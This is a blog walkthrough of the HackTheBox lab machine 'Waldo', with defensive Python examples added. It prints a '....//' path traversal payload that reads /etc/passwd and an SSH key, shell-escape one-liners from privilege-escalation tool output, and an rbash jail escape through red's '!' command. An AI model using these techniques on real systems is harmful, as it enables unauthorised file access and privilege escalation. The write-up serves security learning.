NeilSec: Security Learning Blog

Pentesting, infosec, hacking, learning.


HackTheBox: Waldo – Walkthough

2018-09-11 by Neil

Initial Enumeration

So we have a Linux box with 2 open ports and a filtered port. Let’s check out the open ports in turn:

22/OpenSSH 7.5p2

Not much use at this stage. There are no known exploits for it and no usernames to even brute force.

80/HTTP nginx 1.12.2

Browsing to the site shows:

It’s a Where’s Waldo (that’s Where’s Wally to us Brits) themed site with a web app called List Manager. If you click Add List, a list is added and given the next number in the sequence. And you can delete it with the Delete button.

Viewing the page source we can see it uses a JavaScript file called list.js

and we can look at the code for that. Here is some of it:

I’m no JavaScript expert but I can see some PHP files being called, fileWrite.php and fileDelete.php etc., and a POST request is being used.

Time to fire up Burp Suite to intercept and analyse these requests. Using FoxyProxy to make switching traffic to Burp easy, turn on Intercept and try the Add List button:

As suspected, that button sends a POST request to fileWrite.php, which is in the root web folder /. There are some parameters in the Body. We can specify the list number with the listnum parameter and even add data to it using the data parameter.

If we click on one of the lists on the screen we see another PHP file called fileRead.php.

To speed up this discovery process, I just try clicking every possible option, knowing that Burp will store the results in the Site Map:

Also worth noting here is that the dirRead.php refers to a directory: /.list

What do we know about this web app so far?

In the root directory 10.10.10.84/ we have:

  • list.html
  • list.js
  • dirRead.php
  • fileDelete.php
  • fileRead.php
  • fileWrite.php

And there is a directory /.list/ which we don’t have permission to access. We can alter the parameters being sent via the POST requests.

With Burp the easiest way of fiddling around with these things is to use the Repeater module, which allows you to repeatedly send requests without having to re-write them each time, and lets you edit any part of them, go back to previous edits etc. In the HTTP History section of the proxy, we find each relevant request, right-click and select Send to Repeater.

Using Repeater I use the fileWrite.php function to create “list 99” just to see if I can, and add some arbitrary data to it. Then I see if I can find it using dirRead.php, which I can. I can also read the file itself using fileRead.php. Unfortunately writing PHP code into the list file doesn’t execute, so no easy shell there. This is likely because I’m using a PHP function to read the file rather than GETting it, which would trigger the PHP interpreter. The list files, including my “list 99”, are being stored in 10.10.10.87/.list which is not accessible by the browser or other GET request mechanisms. However all is not lost because whilst I cannot render PHP, that means I can read PHP source code, and so let’s look at these files, starting with fileRead.php itself:

The PHP source code comes back mangled. I don’t know if there is an elegant way of sorting this out but I used Word’s find-and-replace function to swap these escape sequences:

\n = newline
\t = tab
\" = '
\/ = /

and got this far:

<?php
// fileRead.php as recovered from the box, with the quotes un-mangled.
if($_SERVER['REQUEST_METHOD'] === 'POST')
{
    $fileContent['file'] = false;
    header('Content-Type: application/json');

    if(isset($_POST['file'])){
        header('Content-Type: application/json');
        // A single, non-recursive pass: strips '../' and '..\' once each.
        $_POST['file'] = str_replace( array('../', '..\\'), '', $_POST['file']);
        // Denylist of exactly one filename.
        if(strpos($_POST['file'], 'user.txt') === false){
            $file = fopen('/var/www/html/' . $_POST['file'], 'r');
            // filesize() is given the relative name, so this relies on the web root being the working directory.
            $fileContent['file'] = fread($file, filesize($_POST['file']));
            fclose($file); // the $file argument was missing in the recovered copy
        }
    }
    echo json_encode($fileContent);
}

My PHP isn’t great so this could be wrong, but it’s clear there is some filtering going on to stop you from just browsing for files easily. Straight away we can see that it’s not going to let you read the user.txt file! And then it looks like it’s deleting “../” and “..\”, which is going to make the usual directory traversal techniques harder. Normally you just use ../ to go up in the directory tree but this will merely delete that. After messing around with it for a while I hit upon the idea of using ....// so that when the ../ is deleted, we’re left with ../ and this works fine, and I’m able to read the /etc/passwd file at ....//....//....//etc/passwd
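The filter’s weakness and its fix, as an added example written for this walkthrough (not the box’s own code): a Python mirror of the single-pass str_replace() above, showing why a stripped ../ reappears, beside a containment check that rejects anything resolving outside the web root. WEB_ROOT is the /var/www/html from the source; the function names are my own.

```python
import posixpath

# Web root hard-coded in the box's fileRead.php.
WEB_ROOT = "/var/www/html"


def vulnerable_filter(user_path):
    """Mirror of the str_replace() in fileRead.php: one non-recursive pass
    that deletes '../' and '..\\'. Input crafted so that a '../' only
    *appears* after the deletion passes straight through."""
    return user_path.replace("../", "").replace("..\\", "")


def vulnerable_target(user_path):
    """Absolute path the vulnerable code hands to fopen(), or None when the
    single denylisted name (user.txt) is present."""
    cleaned = vulnerable_filter(user_path)
    if "user.txt" in cleaned:
        return None
    return posixpath.normpath(WEB_ROOT + "/" + cleaned)


def hardened_target(user_path, root=WEB_ROOT):
    """Fix: stop trying to strip bad sequences. Join, normalise, and require
    the result to stay inside root, rejecting everything else (absolute
    paths included). Returns the path to open, or None when rejected.
    In production also resolve with os.path.realpath so a symlink inside
    the web root cannot point back out of it."""
    if "\x00" in user_path:  # fopen() would reject a NUL byte anyway
        return None
    root = posixpath.normpath(root)
    candidate = posixpath.normpath(posixpath.join(root, user_path))
    if not candidate.startswith(root + "/"):
        return None
    return candidate


if __name__ == "__main__":
    for probe in ("../../../etc/passwd", "....//....//....//etc/passwd"):
        print(probe, "->", vulnerable_target(probe), "| hardened:", hardened_target(probe))
```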

Note there is a user with a /bin/sh login called “nobody”. Let’s check out his home folder. There are several files in there:

[".","..",".ash_history",".ssh",".viminfo","user.txt"]

We know we cannot read user.txt, but in the .ssh directory there are very interesting files, not least the .monitor file containing a private RSA key:

SSH allows authenticating via public/private key pairs instead of passwords. The private key is the one required by the ssh client so we should be able to use this to ssh in. However it looks a bit mangled so hopefully our find/replace system will work on this too. After running it through that I get:

-----BEGIN RSA PRIVATE KEY-----
[key body omitted]
-----END RSA PRIVATE KEY-----

That looks very much like a legit RSA key too. So now to paste that into a key file, set the permissions of the file to secure it (ssh requires this) and see if it works:

We’re in! Let’s grab the user.txt file to paste into the HTB system and move on.

In the .ssh folder there is an authorized_keys file containing a reference to a user called monitor:

This is confusing. I would assume that the nobody key is authorised (or how else did it work) and yet this file only has one key and it mentions “monitor@waldowaldo”. Weird. And why “@waldowaldo” when the machine is called “waldo”?

I’m going to check that this is the key we just used, just to be sure. The easiest way is to use ssh-keygen to generate a public key from the private key we have and see if it matches the one in the authorized_keys file:

root@kali:~/HTB/Waldo# ssh-keygen -y -e -f key
---- BEGIN SSH2 PUBLIC KEY ----
Comment: "2048-bit RSA, converted by root@kali from OpenSSH"
AAAAB3NzaC1yc2EAAAADAQABAAABAQCzuzK0MT740dpYH17403dXm3UM/VNgdz7ijwPfra
Xk3B/oKmWZHgkfqfg1xx2bVlT6oHvuWLxk6/KYG0gRjgWbTtfg+q3jN40F+opaQ5zJXVMt
bp/zuzQVkGFgCLMas014suEHUhkiOkNUlRtJcbqzZzECV7XhyP6mcSJFOzIyKrWckJJ0YJ
z+A2lb8AA0g3i9b0qyUuqIAQMl9yFjnmwInnXrZj34jXHOoXx71vXbBVeKu82jw8sacUlX
DpIeGY8my572+MAh4f6f7leRtzz/qlx6jCqz26NGQ3Mf1PWUmrgXHVW+L3cNqrdtnd2Egh
ZpZp+arOD6NJOFJY4jBHvf
---- END SSH2 PUBLIC KEY ----
root@kali:~/HTB/Waldo#

And of course it does. So WTF is monitor@waldowaldo about then?

Notice how when we ssh’d in, we got a “Welcome to Alpine Wiki” message? Let’s run a privesc tool and see what else

waldo:/tmp$ python linuxprivchecker.py
=================================================================================================
LINUX PRIVILEGE ESCALATION CHECKER
=================================================================================================
[*] GETTING BASIC SYSTEM INFO...
[+] Kernel
Linux version 4.9.0-6-amd64 (debian-kernel@lists.debian.org) (gcc version 6.3.0 20170516 (Debian 6.3.0-18+deb9u1) ) #1 SMP Debian 4.9.88-1 (2018-04-29)
[+] Hostname
waldo
[+] Operating System
Welcome to Alpine Linux 3.6
Kernel \r on an \m (\l)
[*] GETTING NETWORKING INFO...
[+] Interfaces
docker0 Link encap:Ethernet HWaddr 02:42:07:0A:99:80
inet addr:172.17.0.1 Bcast:172.17.255.255 Mask:255.255.0.0
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
ens33 Link encap:Ethernet HWaddr 00:50:56:A4:A8:C1
inet addr:10.10.10.87 Bcast:10.10.10.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1143587 errors:0 dropped:102 overruns:0 frame:0
TX packets:965321 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:161520906 (154.0 MiB) TX bytes:201250810 (191.9 MiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:4416890 errors:0 dropped:0 overruns:0 frame:0
TX packets:4416890 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1
RX bytes:560407680 (534.4 MiB) TX bytes:560407680 (534.4 MiB)
[+] Netstat
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:8888 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:9000 0.0.0.0:* LISTEN -
tcp 0 1152 10.10.10.87:8888 10.10.14.19:51932 ESTABLISHED -
tcp 0 0 :::80 :::* LISTEN -
tcp 0 0 :::22 :::* LISTEN -
tcp 0 0 :::8888 :::* LISTEN -
udp 0 0 10.10.10.87:35491 10.10.10.2:53 ESTABLISHED -
[+] Route
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default 10.10.10.2 0.0.0.0 UG 0 0 0 ens33
10.10.10.0 * 255.255.255.0 U 0 0 0 ens33
169.254.0.0 * 255.255.0.0 U 1000 0 0 ens33
172.17.0.0 * 255.255.0.0 U 0 0 0 docker0
[*] GETTING FILESYSTEM INFO...
[+] Mount results
[+] fstab entries
/dev/cdrom /media/cdrom iso9660 noauto,ro 0 0
/dev/usbdisk /media/usb vfat noauto,ro 0 0
[+] Scheduled cron jobs
total 12
drwxr-xr-x 2 root root 4096 Jan 9 2018 .
drwxr-xr-x 1 root root 4096 May 3 20:50 ..
-rw------- 1 root root 283 Apr 24 2017 root
[+] Writable cron dirs

[*] ENUMERATING USER AND ENVIRONMENTAL INFO...
[+] Logged in User Activity
[+] Super Users Found:
root
[+] Environment
USER=nobody
SSH_CLIENT=10.10.14.19 51932 8888
MAIL=/var/mail/nobody
SHLVL=2
HOME=/home/nobody
OLDPWD=/
SSH_TTY=/dev/pts/1
PAGER=less
PS1=\h:\w\$
LOGNAME=nobody
TERM=xterm-256color
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
SHELL=/bin/sh
PWD=/tmp
SSH_CONNECTION=10.10.14.19 51932 10.10.10.87 8888
CHARSET=UTF-8
[+] Root and current user history (depends on privs)
lrwxrwxrwx 1 root root 9 Jul 24 11:57 /home/nobody/.ash_history -> /dev/null
[+] Sudoers (privileged)
[+] All users
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/usr/lib/news:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
operator:x:11:0:operator:/root:/bin/sh
man:x:13:15:man:/usr/man:/sbin/nologin
postmaster:x:14:12:postmaster:/var/spool/mail:/sbin/nologin
cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
ftp:x:21:21::/var/lib/ftp:/sbin/nologin
sshd:x:22:22:sshd:/dev/null:/sbin/nologin
at:x:25:25:at:/var/spool/cron/atjobs:/sbin/nologin
squid:x:31:31:Squid:/var/cache/squid:/sbin/nologin
xfs:x:33:33:X Font Server:/etc/X11/fs:/sbin/nologin
games:x:35:35:games:/usr/games:/sbin/nologin
postgres:x:70:70::/var/lib/postgresql:/bin/sh
cyrus:x:85:12::/usr/cyrus:/sbin/nologin
vpopmail:x:89:89::/var/vpopmail:/sbin/nologin
ntp:x:123:123:NTP:/var/empty:/sbin/nologin
smmsp:x:209:209:smmsp:/var/spool/mqueue:/sbin/nologin
guest:x:405:100:guest:/dev/null:/sbin/nologin
nobody:x:65534:65534:nobody:/home/nobody:/bin/sh
nginx:x:100:101:nginx:/var/lib/nginx:/sbin/nologin
[+] Current User
nobody
[+] Current User ID
uid=65534(nobody) gid=65534(nobody) groups=65534(nobody)
[*] ENUMERATING FILE AND DIRECTORY PERMISSIONS/CONTENTS...
[+] World Writeable Directories for User/Group 'Root'
drwxrwxrwt 2 root root 40 Sep 10 02:02 /dev/shm
drwxrwxrwt 2 root root 40 Sep 10 02:02 /dev/mqueue
drwxrwxrwt 2 root root 40 Sep 10 02:02 /sys/firmware
drwxrwxrwt 1 root root 4096 Sep 12 10:06 /tmp
[+] World Writeable Directories for Users other than Root
[+] World Writable Files
--w--w--w- 1 root root 0 Sep 10 02:02 /sys/fs/cgroup/memory/cgroup.event_control
[+] Checking if root's home folder is accessible
/root:
total 0
[+] SUID/SGID Files and Directories
-rwsr-xr-x 1 root root 41984 May 17 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 50016 May 17 2017 /usr/bin/chage
-rwsr-xr-x 1 root root 18536 May 17 2017 /usr/bin/expiry
-rwsr-xr-x 1 root root 41464 May 17 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 32256 May 17 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 31616 May 17 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 54744 May 17 2017 /usr/bin/gpasswd
-rwxr-sr-x 1 root shadow 26328 May 16 2017 /sbin/unix_chkpwd
[+] Logs containing keyword 'password'
[+] Config files containing keyword 'password'
[+] Shadow File (Privileged)
[*] ENUMERATING PROCESSES AND APPLICATIONS...
[+] Installed Packages
[+] Current processes
PID USER
1 root
7 root daemon off;
8 root
9 root
10 nginx
1142 root
1144 nobody
1145 nobody
1181 nobody
1263 nobody awk '{print $1,$2,$9,$10,$11}'
1264 nobody
1265 nobody
[+] Apache Version and Modules
[+] Apache Config File
[+] Sudo Version (Check out https://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=sudo)
[*] IDENTIFYING PROCESSES AND PACKAGES RUNNING AS ROOT OR OTHER SUPERUSER...
1 root 
8 root 
7 root daemon off; 
1142 root 
9 root
[*] ENUMERATING INSTALLED LANGUAGES/TOOLS FOR SPLOIT BUILDING...
[+] Installed Tools
/usr/bin/awk
/usr/bin/python
/usr/bin/vi
/usr/bin/vim
/usr/bin/find
/usr/bin/nc
/usr/bin/wget
/usr/bin/tftp
[+] Related Shell Escape Sequences...
vi--> :!bash
vi--> :set shell=/bin/bash:shell
vi--> :!bash
vi--> :set shell=/bin/bash:shell
awk--> awk 'BEGIN {system("/bin/bash")}'
find--> find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' \;
[*] FINDING RELEVENT PRIVILEGE ESCALATION EXPLOITS...
Note: Exploits relying on a compile/scripting language not detected on this system are marked with a '**' but should still be tested!
The following exploits are ranked higher in probability of success because this script detected a related running process, OS, or mounted file system
- Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit || https://www.exploit-db.com/exploits/5720 || Language=python
- Ubuntu/Debian Apache 1.3.33/1.3.34 (CGI TTY) Local Root Exploit || https://www.exploit-db.com/exploits/3384 || Language=c
The following exploits are applicable to this kernel version and should be investigated as well
- Kernel ia32syscall Emulation Privilege Escalation || https://www.exploit-db.com/exploits/15023 || Language=c
- Sendpage Local Privilege Escalation || https://www.exploit-db.com/exploits/19933 || Language=ruby**
- CAP_SYS_ADMIN to Root Exploit 2 (32 and 64-bit) || https://www.exploit-db.com/exploits/15944 || Language=c
- CAP_SYS_ADMIN to root Exploit || https://www.exploit-db.com/exploits/15916 || Language=c
- MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit || https://www.exploit-db.com/exploits/1518 || Language=c
- open-time Capability file_ns_capable() Privilege Escalation || https://www.exploit-db.com/exploits/25450 || Language=c
- open-time Capability file_ns_capable() - Privilege Escalation Vulnerability || https://www.exploit-db.com/exploits/25307 || Language=c
Finished
=================================================================================================
waldo:/tmp$

That is an oddly minimal output compared to the usual ones.

There are a few hidden files and a directory in nobody’s home folder:

The user.txt token is there and readable so Step 1 accomplished.

In the .ssh folder:

And let’s check out the .viminfo file. There’s quite a lot in it and most of it centres around changes made to the following files: ~/rootkey and /dev/shm/id_rsa – neither of which appear to exist anymore.

The .monitor file is a private RSA key file. It is not the same one we used to ssh in as the user nobody:

At this point I got caught up in trying to work out why root’s shell was /bin/ash and not /bin/bash, which led me to finding out we were on some sort of BusyBox machine etc., when I should have seen what was in front of me: if you’ve been given something as valuable as a private SSH key and user name (“monitor”) then you sure as hell ought to at least try using them. The problem is I’d made the mistake of looking at some hints on the HTB forum which totally misled me and I ended up wasting hours chasing irrelevant nonsense. Sometimes a little (cryptic) knowledge is a dangerous thing.

So using the .monitor key, just as before we find Waldo:

The monitor user is even more restricted than nobody and appears to be in a chroot “jail”. Files from his home directory:

As you can see, he has very limited commands available but does have PATH set up for the app-dev folder files:

Escaping rbash Jail

Just 4 commands available: ls, most, red and rnano. These are symbolic links to the files in the root system outside of our chroot jail. The commands:

  • ls is just the normal ls
  • most is another output paging thing like more or less
  • red is a restricted form of ed, which is a line-based text editor, apparently
  • rnano is a restricted form of nano, the popular Linux editor.

Interestingly though, the symlinks of red and rnano actually go to their unrestricted counterparts which might be relevant.

Maybe we can use this fact to browse or otherwise edit items outside of the chroot jail? I tried opening a file in nano using Ctrl-R but got an error saying it was not allowed in restricted mode, so maybe my theory isn’t sound? I don’t know the first thing about red/ed so will have to google that. First page I found was: https://www.tutorialspoint.com/unix_commands/ed.htm

First thing I tried was to give my ed session a prompt “red:” – just to amuse myself and so it was clear that ed command worked:

According to that guide you can specify a file to edit, but if you prefix it with a bang (!) it is interpreted as a shell command, so the obvious move is to open a shell outside of the chroot jail and thus escape it. This works perfectly:
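As an added example for this section (my code, not the author’s or the box’s), a Python audit for the two misconfigurations the monitor account exhibits: allowed-command symlinks (red, rnano) that resolve to the unrestricted ed and nano, and PATH entries an rbash user can turn against the jail, such as the relative PATH$ entry and the /tmp/ directory seen in the LinEnum output below. It builds a constructed directory layout under a temp dir rather than inspecting the live system; RESTRICTED_TO_FULL and the function names are my assumptions.

```python
import os
import stat
import tempfile

# Restricted wrapper name -> the unrestricted binary it must not resolve to.
# red and rnano come from the box; the other two are added for generality.
RESTRICTED_TO_FULL = {"red": "ed", "rnano": "nano", "rvim": "vim", "rbash": "bash"}


def audit_allowed_commands(bin_dir):
    """Follow each symlink in a restricted user's command directory and
    report (name, final target, reason) for links that quietly hand the
    user the unrestricted editor or shell, e.g. red -> /bin/ed."""
    findings = []
    for name in sorted(os.listdir(bin_dir)):
        link = os.path.join(bin_dir, name)
        if not os.path.islink(link):
            continue
        target = os.path.basename(os.path.realpath(link))
        if RESTRICTED_TO_FULL.get(name) == target:
            findings.append((name, target, "restricted name links to unrestricted binary"))
    return findings


def audit_path_entries(path_value):
    """Flag PATH entries that undo rbash: relative (or empty) entries, which
    are searched relative to the current directory, and world-writable
    directories, where the user can drop binaries of their own."""
    findings = []
    for entry in path_value.split(":"):
        if not entry.startswith("/"):
            findings.append((entry, "relative or empty PATH entry"))
            continue
        try:
            mode = os.stat(entry).st_mode
        except OSError:
            continue  # missing directory: nothing resolves there
        if mode & stat.S_IWOTH:
            findings.append((entry, "world-writable directory"))
    return findings


def build_demo_layout(base):
    """Constructed layout mirroring the box: empty stand-ins for the real
    binaries, ~/bin symlinks ls, most, red -> ed, rnano -> nano, and a
    world-writable tmp dir. Returns (bin_dir, tmp_dir)."""
    real = os.path.join(base, "usr", "bin")
    os.makedirs(real)
    for exe in ("ls", "most", "ed", "nano"):
        path = os.path.join(real, exe)
        open(path, "w").close()
        os.chmod(path, 0o755)
    bin_dir = os.path.join(base, "home", "monitor", "bin")
    os.makedirs(bin_dir)
    os.chmod(bin_dir, 0o755)
    for name, target in (("ls", "ls"), ("most", "most"), ("red", "ed"), ("rnano", "nano")):
        os.symlink(os.path.join(real, target), os.path.join(bin_dir, name))
    tmp_dir = os.path.join(base, "tmp")
    os.makedirs(tmp_dir)
    os.chmod(tmp_dir, 0o1777)
    return bin_dir, tmp_dir


def run_demo():
    """Build the layout in a temp dir and audit a PATH shaped like the
    box's (note the bogus relative 'PATH$' entry and the tmp dir)."""
    base = tempfile.mkdtemp(prefix="rbash-audit-")
    bin_dir, tmp_dir = build_demo_layout(base)
    path_value = ":".join(["PATH$", bin_dir, tmp_dir, "/nonexistent"])
    return {"commands": audit_allowed_commands(bin_dir),
            "path": audit_path_entries(path_value)}


if __name__ == "__main__":
    for section, rows in run_demo().items():
        print(section)
        for row in rows:
            print("  ", *row)
```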

Now for a bit of enumeration:

monitor@waldo:/tmp$ LinEnum.sh
########################################################## Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# 
[-] Debug Info
[+] Thorough tests = Disabled (SUID/GUID checks will not be perfomed!)

Scan started at:
Thu Sep 13 09:38:53 EDT 2018

### SYSTEM ##############################################
[-] Kernel information:
Linux waldo 4.9.0-6-amd64 #1 SMP Debian 4.9.88-1 (2018-04-29) x86_64 GNU/Linux

[-] Kernel information (continued):
Linux version 4.9.0-6-amd64 (debian-kernel@lists.debian.org) (gcc version 6.3.0 20170516 (Debian 6.3.0-18+deb9u1) ) #1 SMP Debian 4.9.88-1 (2018-04-29)

[-] Specific release information:
PRETTY_NAME="Debian GNU/Linux 9 (stretch)"
NAME="Debian GNU/Linux"
VERSION_ID="9"
VERSION="9 (stretch)"
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

[-] Hostname:
waldo

### USER/GROUP ##########################################
[-] Current user/group info:
uid=1001(monitor) gid=1001(monitor) groups=1001(monitor)

[-] Who else is logged on:
 09:38:53 up  5:34,  1 user,  load average: 0.13, 0.03, 0.01
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
monitor  pts/0    127.0.0.1        06:27    4.00s  6.28s  0.00s /bin/bash /tmp/LinEnum.sh

[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(systemd-timesync) gid=102(systemd-timesync) groups=102(systemd-timesync)
uid=101(systemd-network) gid=103(systemd-network) groups=103(systemd-network)
uid=102(systemd-resolve) gid=104(systemd-resolve) groups=104(systemd-resolve)
uid=103(systemd-bus-proxy) gid=105(systemd-bus-proxy) groups=105(systemd-bus-proxy)
uid=104(_apt) gid=65534(nogroup) groups=65534(nogroup)
uid=105(avahi-autoipd) gid=109(avahi-autoipd) groups=109(avahi-autoipd)
uid=106(messagebus) gid=110(messagebus) groups=110(messagebus)
uid=107(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=1000(steve) gid=1000(steve) groups=1000(steve),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),111(bluetooth)
uid=1001(monitor) gid=1001(monitor) groups=1001(monitor)
uid=1002(app-dev) gid=1002(app-dev) groups=1002(app-dev)

[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
avahi-autoipd:x:105:109:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
steve:x:1000:1000:steve,,,:/home/steve:/bin/bash
monitor:x:1001:1001:User for editing source and monitoring logs,,,:/home/monitor:/bin/rbash
app-dev:x:1002:1002:User for managing app-dev,,,:/home/app-dev:/bin/bash

[-] Super user account(s):
root

[-] Are permissions on /home directories lax:
total 20K
drwxr-xr-x  5 root    root    4.0K May  3 16:50 .
drwxr-xr-x 22 root    root    4.0K May  1 23:04 ..
drwxr-xr-x  2 app-dev app-dev 4.0K May  3 16:50 app-dev
drwxr-x---  5 root    monitor 4.0K Jul 24 07:58 monitor
drwxr-xr-x  2 steve   steve   4.0K May  1 23:30 steve

### ENVIRONMENTAL #######################################
[-] Environment information:
SSH_CONNECTION=127.0.0.1 35820 127.0.1.1 22
LANG=en_US.UTF-8
OLDPWD=/home/monitor
XDG_SESSION_ID=11
USER=monitor
PWD=/tmp
HOME=/home/monitor
SSH_CLIENT=127.0.0.1 35820 22
SSH_TTY=/dev/pts/0
MAIL=/var/mail/monitor
TERM=xterm-256color
SHELL=/bin/rbash
SHLVL=3
LOGNAME=monitor
XDG_RUNTIME_DIR=/run/user/1001
PATH=PATH$:/home/monitor/bin:/home/monitor/app-dev:/home/monitor/app-dev/v0.1:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/etc/:/tmp/
_=/usr/bin/env

[-] Path information:
PATH$:/home/monitor/bin:/home/monitor/app-dev:/home/monitor/app-dev/v0.1:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/etc/:/tmp/

[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash

[-] Current umask value:
0111
u=rw,g=rw,o=rw

[-] umask value as specified in /etc/login.defs:
UMASK		022

[-] Password and storage information:
PASS_MAX_DAYS	99999
PASS_MIN_DAYS	0
PASS_WARN_AGE	7
ENCRYPT_METHOD SHA512

### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r-- 1 root root  722 Oct  7  2017 /etc/crontab
/etc/cron.d:
total 16
drwxr-xr-x  2 root root 4096 May  1 23:26 .
drwxr-xr-x 80 root root 4096 Jul 24 05:50 ..
-rw-r--r--  1 root root  285 May 29  2017 anacron
-rw-r--r--  1 root root  102 Oct  7  2017 .placeholder
/etc/cron.daily:
total 40
drwxr-xr-x  2 root root 4096 May  1 23:26 .
drwxr-xr-x 80 root root 4096 Jul 24 05:50 ..
-rwxr-xr-x  1 root root  311 May 29  2017 0anacron
-rwxr-xr-x  1 root root 1474 Sep 13  2017 apt-compat
-rwxr-xr-x  1 root root  355 Oct 25  2016 bsdmainutils
-rwxr-xr-x  1 root root 1597 Feb 22  2017 dpkg
-rwxr-xr-x  1 root root   89 May  5  2015 logrotate
-rwxr-xr-x  1 root root 1065 Dec 13  2016 man-db
-rwxr-xr-x  1 root root  249 May 17  2017 passwd
-rw-r--r--  1 root root  102 Oct  7  2017 .placeholder
/etc/cron.hourly:
total 12
drwxr-xr-x  2 root root 4096 May  1 23:03 .
drwxr-xr-x 80 root root 4096 Jul 24 05:50 ..
-rw-r--r--  1 root root  102 Oct  7  2017 .placeholder
/etc/cron.monthly:
total 16
drwxr-xr-x  2 root root 4096 May  1 23:26 .
drwxr-xr-x 80 root root 4096 Jul 24 05:50 ..
-rwxr-xr-x  1 root root  313 May 29  2017 0anacron
-rw-r--r--  1 root root  102 Oct  7  2017 .placeholder
/etc/cron.weekly:
total 20
drwxr-xr-x  2 root root 4096 May  1 23:26 .
drwxr-xr-x 80 root root 4096 Jul 24 05:50 ..
-rwxr-xr-x  1 root root  312 May 29  2017 0anacron
-rwxr-xr-x  1 root root  723 Dec 13  2016 man-db
